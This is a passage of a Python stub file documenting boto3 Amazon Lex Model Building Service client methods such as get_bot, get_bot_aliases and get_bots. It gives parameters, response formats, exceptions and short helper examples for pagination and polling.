The maximum time in seconds that Amazon Lex retains the data gathered in a conversation. For more information, see PutBot .
voiceId (string) --
The Amazon Polly voice ID that Amazon Lex uses for voice interaction with the user. For more information, see PutBot .
checksum (string) --
Checksum of the bot used to identify a specific revision of the bot\'s $LATEST version.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
locale (string) --
The target locale for the bot.
childDirected (boolean) --
For each Amazon Lex bot created with the Amazon Lex Model Building Service, you must specify whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to the Children\'s Online Privacy Protection Act (COPPA) by specifying true or false in the childDirected field. By specifying true in the childDirected field, you confirm that your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. By specifying false in the childDirected field, you confirm that your use of Amazon Lex is not related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA. You may not specify a default value for the childDirected field that does not accurately reflect whether your use of Amazon Lex is related to a website, program, or other application that is directed or targeted, in whole or in part, to children under age 13 and subject to COPPA.
If your use of Amazon Lex relates to a website, program, or other application that is directed in whole or in part, to children under age 13, you must obtain any required verifiable parental consent under COPPA. For information regarding the use of Amazon Lex in connection with websites, programs, or other applications that are directed or targeted, in whole or in part, to children under age 13, see the Amazon Lex FAQ.
detectSentiment (boolean) --
Indicates whether user utterances should be sent to Amazon Comprehend for sentiment analysis.
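The status values above suggest a polling loop after starting a build. A sketch, assuming `client` is a `boto3.client('lex-models')` instance; the function name, delay, and poll count are illustrative:

```python
import time

def wait_for_build(client, name, version_or_alias, delay=5, max_polls=60):
    """Poll get_bot until the build reaches a terminal status.

    Sketch only: returns the terminal status, or raises on failure
    or timeout.
    """
    for _ in range(max_polls):
        bot = client.get_bot(name=name, versionOrAlias=version_or_alias)
        status = bot['status']
        if status in ('READY', 'READY_BASIC_TESTING'):
            return status
        if status == 'FAILED':
            raise RuntimeError(bot.get('failureReason', 'build failed'))
        time.sleep(delay)  # BUILDING or NOT_BUILT: keep polling
    raise TimeoutError('bot did not finish building in time')
```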
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get configuration information for a bot.
response = client.get_bot(
name='DocOrderPizzaBot',
versionOrAlias='$LATEST',
)
print(response)
Expected Output:
{
'version': '$LATEST',
'name': 'DocOrderPizzaBot',
'abortStatement': {
'messages': [
{
'content': 'I don\'t understand. Can you try again?',
'contentType': 'PlainText',
},
{
'content': 'I\'m sorry, I don\'t understand.',
'contentType': 'PlainText',
},
],
},
'checksum': '20172ee3-fa06-49b2-bbc5-667c090303e9',
'childDirected': True,
'clarificationPrompt': {
'maxAttempts': 1,
'messages': [
{
'content': 'I\'m sorry, I didn\'t hear that. Can you repeat what you just said?',
'contentType': 'PlainText',
},
{
'content': 'Can you say that again?',
'contentType': 'PlainText',
},
],
},
'createdDate': 1494360160.133,
'description': 'Orders a pizza from a local pizzeria.',
'idleSessionTTLInSeconds': 300,
'intents': [
{
'intentName': 'DocOrderPizza',
'intentVersion': '$LATEST',
},
],
'lastUpdatedDate': 1494360160.133,
'locale': 'en-US',
'status': 'NOT_BUILT',
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'name': 'string',
'description': 'string',
'intents': [
{
'intentName': 'string',
'intentVersion': 'string'
},
],
'clarificationPrompt': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'maxAttempts': 123,
'responseCard': 'string'
},
'abortStatement': {
'messages': [
{
'contentType': 'PlainText'|'SSML'|'CustomPayload',
'content': 'string',
'groupNumber': 123
},
],
'responseCard': 'string'
},
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'failureReason': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'idleSessionTTLInSeconds': 123,
'voiceId': 'string',
'checksum': 'string',
'version': 'string',
'locale': 'en-US'|'en-GB'|'de-DE',
'childDirected': True|False,
'detectSentiment': True|False
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_bot_alias(name=None, botName=None):
"""
Returns information about an Amazon Lex bot alias. For more information about aliases, see versioning-aliases .
This operation requires permissions for the lex:GetBotAlias action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_alias(
name='string',
botName='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot alias. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot.\n
:rtype: dict
ReturnsResponse Syntax
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
}
Response Structure
(dict) --
name (string) --
The name of the bot alias.
description (string) --
A description of the bot alias.
botVersion (string) --
The version of the bot that the alias points to.
botName (string) --
The name of the bot that the alias points to.
lastUpdatedDate (datetime) --
The date that the bot alias was updated. When you create a resource, the creation date and the last updated date are the same.
createdDate (datetime) --
The date that the bot alias was created.
checksum (string) --
Checksum of the bot alias.
conversationLogs (dict) --
The settings that determine how Amazon Lex uses conversation logs for the alias.
logSettings (list) --
The settings for your conversation logs. You can log text, audio, or both.
(dict) --
The settings for conversation logs.
logType (string) --
The type of logging that is enabled.
destination (string) --
The destination where logs are delivered.
kmsKeyArn (string) --
The Amazon Resource Name (ARN) of the key used to encrypt audio logs in an S3 bucket.
resourceArn (string) --
The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs are delivered.
resourcePrefix (string) --
The resource prefix is the first part of the S3 object key within the S3 bucket that you specified to contain audio logs. For CloudWatch Logs it is the prefix of the log stream name within the log group that you specified.
iamRoleArn (string) --
The Amazon Resource Name (ARN) of the IAM role used to write your logs to CloudWatch Logs or an S3 bucket.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
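As a usage sketch (assuming a boto3 LexModelBuildingService client; the helper name is illustrative), a lookup can treat a missing alias as None instead of letting NotFoundException propagate:

```python
def find_bot_alias(client, alias_name, bot_name):
    # Return the alias description dict, or None if the alias does not exist.
    try:
        return client.get_bot_alias(name=alias_name, botName=bot_name)
    except client.exceptions.NotFoundException:
        return None
```

Note that boto3 exposes modeled exceptions on the client itself (client.exceptions.NotFoundException), so no extra import is needed to catch them.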
"""
pass
def get_bot_aliases(botName=None, nextToken=None, maxResults=None, nameContains=None):
"""
Returns a list of aliases for a specified Amazon Lex bot.
This operation requires permissions for the lex:GetBotAliases action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_aliases(
botName='string',
nextToken='string',
maxResults=123,
nameContains='string'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the bot.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of aliases. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of aliases, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of aliases to return in the response. The default is 50.
:type nameContains: string
:param nameContains: Substring to match in bot alias names. An alias will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
Returns
Response Syntax
{
'BotAliases': [
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
BotAliases (list) --
An array of BotAliasMetadata objects, each describing a bot alias.
(dict) --
Provides information about a bot alias.
name (string) --
The name of the bot alias.
description (string) --
A description of the bot alias.
botVersion (string) --
The version of the Amazon Lex bot to which the alias points.
botName (string) --
The name of the bot to which the alias points.
lastUpdatedDate (datetime) --
The date that the bot alias was updated. When you create a resource, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot alias was created.
checksum (string) --
Checksum of the bot alias.
conversationLogs (dict) --
Settings that determine how Amazon Lex uses conversation logs for the alias.
logSettings (list) --
The settings for your conversation logs. You can log text, audio, or both.
(dict) --
The settings for conversation logs.
logType (string) --
The type of logging that is enabled.
destination (string) --
The destination where logs are delivered.
kmsKeyArn (string) --
The Amazon Resource Name (ARN) of the key used to encrypt audio logs in an S3 bucket.
resourceArn (string) --
The Amazon Resource Name (ARN) of the CloudWatch Logs log group or S3 bucket where the logs are delivered.
resourcePrefix (string) --
The resource prefix is the first part of the S3 object key within the S3 bucket that you specified to contain audio logs. For CloudWatch Logs it is the prefix of the log stream name within the log group that you specified.
iamRoleArn (string) --
The Amazon Resource Name (ARN) of the IAM role used to write your logs to CloudWatch Logs or an S3 bucket.
nextToken (string) --
A pagination token for fetching the next page of aliases. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of aliases, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'BotAliases': [
{
'name': 'string',
'description': 'string',
'botVersion': 'string',
'botName': 'string',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'checksum': 'string',
'conversationLogs': {
'logSettings': [
{
'logType': 'AUDIO'|'TEXT',
'destination': 'CLOUDWATCH_LOGS'|'S3',
'kmsKeyArn': 'string',
'resourceArn': 'string',
'resourcePrefix': 'string'
},
],
'iamRoleArn': 'string'
}
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
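Because the response is truncated at maxResults, collecting every alias requires following nextToken. A minimal pagination sketch (the helper name is illustrative; assumes a boto3 client):

```python
def list_all_bot_aliases(client, bot_name):
    # Collect every alias for a bot, following nextToken pagination.
    aliases = []
    kwargs = {'botName': bot_name, 'maxResults': 50}
    while True:
        response = client.get_bot_aliases(**kwargs)
        aliases.extend(response.get('BotAliases', []))
        token = response.get('nextToken')
        if not token:
            return aliases
        kwargs['nextToken'] = token
```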
"""
pass
def get_bot_channel_association(name=None, botName=None, botAlias=None):
"""
Returns information about the association between an Amazon Lex bot and a messaging platform.
This operation requires permissions for the lex:GetBotChannelAssociation action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_channel_association(
name='string',
botName='string',
botAlias='string'
)
:type name: string
:param name: [REQUIRED]\nThe name of the association between the bot and the channel. The name is case sensitive.\n
:type botName: string
:param botName: [REQUIRED]\nThe name of the Amazon Lex bot.\n
:type botAlias: string
:param botAlias: [REQUIRED]\nAn alias pointing to the specific version of the Amazon Lex bot to which this association is being made.\n
:rtype: dict
Returns
Response Syntax
{
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
}
Response Structure
(dict) --
name (string) --
The name of the association between the bot and the channel.
description (string) --
A description of the association between the bot and the channel.
botAlias (string) --
An alias pointing to the specific version of the Amazon Lex bot to which this association is being made.
botName (string) --
The name of the Amazon Lex bot.
createdDate (datetime) --
The date that the association between the bot and the channel was created.
type (string) --
The type of the messaging platform.
botConfiguration (dict) --
Provides information that the messaging platform needs to communicate with the Amazon Lex bot.
(string) --
(string) --
status (string) --
The status of the bot channel.
CREATED - The channel has been created and is ready for use.
IN_PROGRESS - Channel creation is in progress.
FAILED - There was an error creating the channel. For information about the reason for the failure, see the failureReason field.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to create the association.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
}
:returns:
(string) --
(string) --
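Since status can be IN_PROGRESS, CREATED, or FAILED, callers typically branch on it. A sketch (helper name is illustrative; assumes a boto3 client):

```python
def channel_association_ready(client, name, bot_name, bot_alias):
    # Return True if the channel is CREATED, False while IN_PROGRESS;
    # raise with the service-provided failureReason if it FAILED.
    response = client.get_bot_channel_association(
        name=name, botName=bot_name, botAlias=bot_alias)
    status = response['status']
    if status == 'FAILED':
        raise RuntimeError(response.get('failureReason', 'channel creation failed'))
    return status == 'CREATED'
```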
"""
pass
def get_bot_channel_associations(botName=None, botAlias=None, nextToken=None, maxResults=None, nameContains=None):
"""
Returns a list of all of the channels associated with the specified bot.
The GetBotChannelAssociations operation requires permissions for the lex:GetBotChannelAssociations action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_channel_associations(
botName='string',
botAlias='string',
nextToken='string',
maxResults=123,
nameContains='string'
)
:type botName: string
:param botName: [REQUIRED]\nThe name of the Amazon Lex bot in the association.\n
:type botAlias: string
:param botAlias: [REQUIRED]\nAn alias pointing to the specific version of the Amazon Lex bot to which this association is being made.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of associations. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of associations, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of associations to return in the response. The default is 50.
:type nameContains: string
:param nameContains: Substring to match in channel association names. An association will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.' To return all bot channel associations, use a hyphen ('-') as the nameContains parameter.
:rtype: dict
Returns
Response Syntax
{
'botChannelAssociations': [
{
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
botChannelAssociations (list) --
An array of objects, one for each association, that provides information about the Amazon Lex bot and its association with the channel.
(dict) --
Represents an association between an Amazon Lex bot and an external messaging platform.
name (string) --
The name of the association between the bot and the channel.
description (string) --
A text description of the association you are creating.
botAlias (string) --
An alias pointing to the specific version of the Amazon Lex bot to which this association is being made.
botName (string) --
The name of the Amazon Lex bot to which this association is being made.
Note
Currently, Amazon Lex supports associations with Facebook, Slack, and Twilio.
createdDate (datetime) --
The date that the association between the Amazon Lex bot and the channel was created.
type (string) --
Specifies the type of association by indicating the type of channel being established between the Amazon Lex bot and the external messaging platform.
botConfiguration (dict) --
Provides information necessary to communicate with the messaging platform.
(string) --
(string) --
status (string) --
The status of the bot channel.
CREATED - The channel has been created and is ready for use.
IN_PROGRESS - Channel creation is in progress.
FAILED - There was an error creating the channel. For information about the reason for the failure, see the failureReason field.
failureReason (string) --
If status is FAILED , Amazon Lex provides the reason that it failed to create the association.
nextToken (string) --
A pagination token that fetches the next page of associations. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of associations, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'botChannelAssociations': [
{
'name': 'string',
'description': 'string',
'botAlias': 'string',
'botName': 'string',
'createdDate': datetime(2015, 1, 1),
'type': 'Facebook'|'Slack'|'Twilio-Sms'|'Kik',
'botConfiguration': {
'string': 'string'
},
'status': 'IN_PROGRESS'|'CREATED'|'FAILED',
'failureReason': 'string'
},
],
'nextToken': 'string'
}
:returns:
(string) --
(string) --
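Using the documented hyphen wildcard for nameContains, a sketch that groups every association for an alias by status (helper name is illustrative; assumes a boto3 client):

```python
def associations_by_status(client, bot_name, bot_alias):
    # Group every channel association for a bot alias by its status.
    # nameContains='-' matches all associations, per the API documentation.
    grouped = {}
    kwargs = {'botName': bot_name, 'botAlias': bot_alias, 'nameContains': '-'}
    while True:
        response = client.get_bot_channel_associations(**kwargs)
        for assoc in response.get('botChannelAssociations', []):
            grouped.setdefault(assoc['status'], []).append(assoc['name'])
        token = response.get('nextToken')
        if not token:
            return grouped
        kwargs['nextToken'] = token
```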
"""
pass
def get_bot_versions(name=None, nextToken=None, maxResults=None):
"""
Gets information about all of the versions of a bot.
The GetBotVersions operation returns a BotMetadata object for each version of a bot. For example, if a bot has three numbered versions, the GetBotVersions operation returns four BotMetadata objects in the response, one for each numbered version and one for the $LATEST version.
The GetBotVersions operation always returns at least one version, the $LATEST version.
This operation requires permissions for the lex:GetBotVersions action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_bot_versions(
name='string',
nextToken='string',
maxResults=123
)
:type name: string
:param name: [REQUIRED]\nThe name of the bot for which versions should be returned.\n
:type nextToken: string
:param nextToken: A pagination token for fetching the next page of bot versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of bot versions to return in the response. The default is 10.
:rtype: dict
Returns
Response Syntax
{
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
bots (list) --
An array of BotMetadata objects, one for each numbered version of the bot plus one for the $LATEST version.
(dict) --
Provides information about a bot.
name (string) --
The name of the bot.
description (string) --
A description of the bot.
status (string) --
The status of the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a bot, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
nextToken (string) --
A pagination token for fetching the next page of bot versions. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of versions, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
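Because the response always includes the $LATEST version alongside any numbered versions, finding the most recent numbered version takes a small filter. A sketch (helper name is illustrative; assumes a boto3 client):

```python
def latest_numbered_version(client, bot_name):
    # Return the highest numbered version of a bot as an int,
    # or None if only the $LATEST version exists.
    versions = []
    kwargs = {'name': bot_name}
    while True:
        response = client.get_bot_versions(**kwargs)
        versions.extend(bot['version'] for bot in response.get('bots', []))
        token = response.get('nextToken')
        if not token:
            break
        kwargs['nextToken'] = token
    numbered = [int(v) for v in versions if v != '$LATEST']
    return max(numbered) if numbered else None
```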
"""
pass
def get_bots(nextToken=None, maxResults=None, nameContains=None):
"""
Returns bot information as follows:
If you provide the nameContains field, the response includes information for the $LATEST version of all bots whose name contains the specified string.
If you don\'t specify the nameContains field, the operation returns information about the $LATEST version of all of your bots.
This operation requires permission for the lex:GetBots action.
See also: AWS API Documentation
Exceptions
Examples
This example shows how to get a list of all of the bots in your account.
Expected Output:
:example: response = client.get_bots(
nextToken='string',
maxResults=123,
nameContains='string'
)
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of bots. If the response to this call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of bots, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of bots to return in the response. The default is 10.
:type nameContains: string
:param nameContains: Substring to match in bot names. A bot will be returned if any part of its name matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:rtype: dict
Returns
Response Syntax
{
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
bots (list) --
An array of botMetadata objects, with one entry for each bot.
(dict) --
Provides information about a bot.
name (string) --
The name of the bot.
description (string) --
A description of the bot.
status (string) --
The status of the bot.
lastUpdatedDate (datetime) --
The date that the bot was updated. When you create a bot, the creation date and last updated date are the same.
createdDate (datetime) --
The date that the bot was created.
version (string) --
The version of the bot. For a new bot, the version is always $LATEST .
nextToken (string) --
If the response is truncated, it includes a pagination token that you can specify in your next request to fetch the next page of bots.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
Examples
This example shows how to get a list of all of the bots in your account.
response = client.get_bots(
maxResults=5,
nextToken='',
)
print(response)
Expected Output:
{
'bots': [
{
'version': '$LATEST',
'name': 'DocOrderPizzaBot',
'createdDate': 1494360160.133,
'description': 'Orders a pizza from a local pizzeria.',
'lastUpdatedDate': 1494360160.133,
'status': 'NOT_BUILT',
},
],
'ResponseMetadata': {
'...': '...',
},
}
:return: {
'bots': [
{
'name': 'string',
'description': 'string',
'status': 'BUILDING'|'READY'|'READY_BASIC_TESTING'|'FAILED'|'NOT_BUILT',
'lastUpdatedDate': datetime(2015, 1, 1),
'createdDate': datetime(2015, 1, 1),
'version': 'string'
},
],
'nextToken': 'string'
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
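Building on the pagination shown in the example above, a sketch that maps each bot name to its $LATEST status (helper name is illustrative; assumes a boto3 client):

```python
def bot_statuses(client, name_contains=None):
    # Map each bot name to its status for the $LATEST version,
    # following nextToken until all bots are collected.
    kwargs = {'maxResults': 50}
    if name_contains is not None:
        kwargs['nameContains'] = name_contains
    statuses = {}
    while True:
        response = client.get_bots(**kwargs)
        for bot in response.get('bots', []):
            statuses[bot['name']] = bot['status']
        token = response.get('nextToken')
        if not token:
            return statuses
        kwargs['nextToken'] = token
```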
"""
pass
def get_builtin_intent(signature=None):
"""
Returns information about a built-in intent.
This operation requires permission for the lex:GetBuiltinIntent action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_builtin_intent(
signature='string'
)
:type signature: string
:param signature: [REQUIRED]\nThe unique identifier for a built-in intent. To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .\n
:rtype: dict
Returns
Response Syntax
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
],
'slots': [
{
'name': 'string'
},
]
}
Response Structure
(dict) --
signature (string) --
The unique identifier for a built-in intent.
supportedLocales (list) --
A list of locales that the intent supports.
(string) --
slots (list) --
An array of BuiltinIntentSlot objects, one entry for each slot type in the intent.
(dict) --
Provides information about a slot used in a built-in intent.
name (string) --
The name of the slot.
Exceptions
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
],
'slots': [
{
'name': 'string'
},
]
}
:returns:
LexModelBuildingService.Client.exceptions.NotFoundException
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
"""
pass
def get_builtin_intents(locale=None, signatureContains=None, nextToken=None, maxResults=None):
"""
Gets a list of built-in intents that meet the specified criteria.
This operation requires permission for the lex:GetBuiltinIntents action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_builtin_intents(
locale='en-US'|'en-GB'|'de-DE',
signatureContains='string',
nextToken='string',
maxResults=123
)
:type locale: string
:param locale: The locale that the returned intents support.
:type signatureContains: string
:param signatureContains: Substring to match in built-in intent signatures. An intent will be returned if any part of its signature matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.' To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, use the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of intents to return in the response. The default is 10.
:rtype: dict
Returns
Response Syntax
{
'intents': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
intents (list) --
An array of builtinIntentMetadata objects, one for each intent in the response.
(dict) --
Provides metadata for a built-in intent.
signature (string) --
A unique identifier for the built-in intent. To find the signature for an intent, see Standard Built-in Intents in the Alexa Skills Kit .
supportedLocales (list) --
A list of identifiers for the locales that the intent supports.
(string) --
nextToken (string) --
A pagination token that fetches the next page of intents. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of intents, specify the pagination token in the next request.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'intents': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def get_builtin_slot_types(locale=None, signatureContains=None, nextToken=None, maxResults=None):
"""
Gets a list of built-in slot types that meet the specified criteria.
For a list of built-in slot types, see Slot Type Reference in the Alexa Skills Kit .
This operation requires permission for the lex:GetBuiltInSlotTypes action.
See also: AWS API Documentation
Exceptions
:example: response = client.get_builtin_slot_types(
locale='en-US'|'en-GB'|'de-DE',
signatureContains='string',
nextToken='string',
maxResults=123
)
:type locale: string
:param locale: The locale that the returned slot types support.
:type signatureContains: string
:param signatureContains: Substring to match in built-in slot type signatures. A slot type will be returned if any part of its signature matches the substring. For example, 'xyz' matches both 'xyzabc' and 'abcxyz.'
:type nextToken: string
:param nextToken: A pagination token that fetches the next page of slot types. If the response to this API call is truncated, Amazon Lex returns a pagination token in the response. To fetch the next page of slot types, specify the pagination token in the next request.
:type maxResults: integer
:param maxResults: The maximum number of slot types to return in the response. The default is 10.
:rtype: dict
Returns
Response Syntax
{
'slotTypes': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
Response Structure
(dict) --
slotTypes (list) --
An array of BuiltInSlotTypeMetadata objects, one entry for each slot type returned.
(dict) --
Provides information about a built-in slot type.
signature (string) --
A unique identifier for the built-in slot type. To find the signature for a slot type, see Slot Type Reference in the Alexa Skills Kit .
supportedLocales (list) --
A list of target locales for the slot.
(string) --
nextToken (string) --
If the response is truncated, the response includes a pagination token that you can use in your next request to fetch the next page of slot types.
Exceptions
LexModelBuildingService.Client.exceptions.LimitExceededException
LexModelBuildingService.Client.exceptions.InternalFailureException
LexModelBuildingService.Client.exceptions.BadRequestException
:return: {
'slotTypes': [
{
'signature': 'string',
'supportedLocales': [
'en-US'|'en-GB'|'de-DE',
]
},
],
'nextToken': 'string'
}
:returns:
(string) --
"""
pass
def get_export(name=None, version=None, resourceType=None, exportType=None):
"""
Exports the contents of an Amazon Lex resource in a specified format.
See also: AWS API Documentation
Exceptions
:example: response = client.get_export(
name='string',
version='string',
resourceType='BOT'|'INTENT'|'SLOT_TYPE',
exportType='ALEXA_SKILLS_KIT'|'LEX'
)
:type name: string
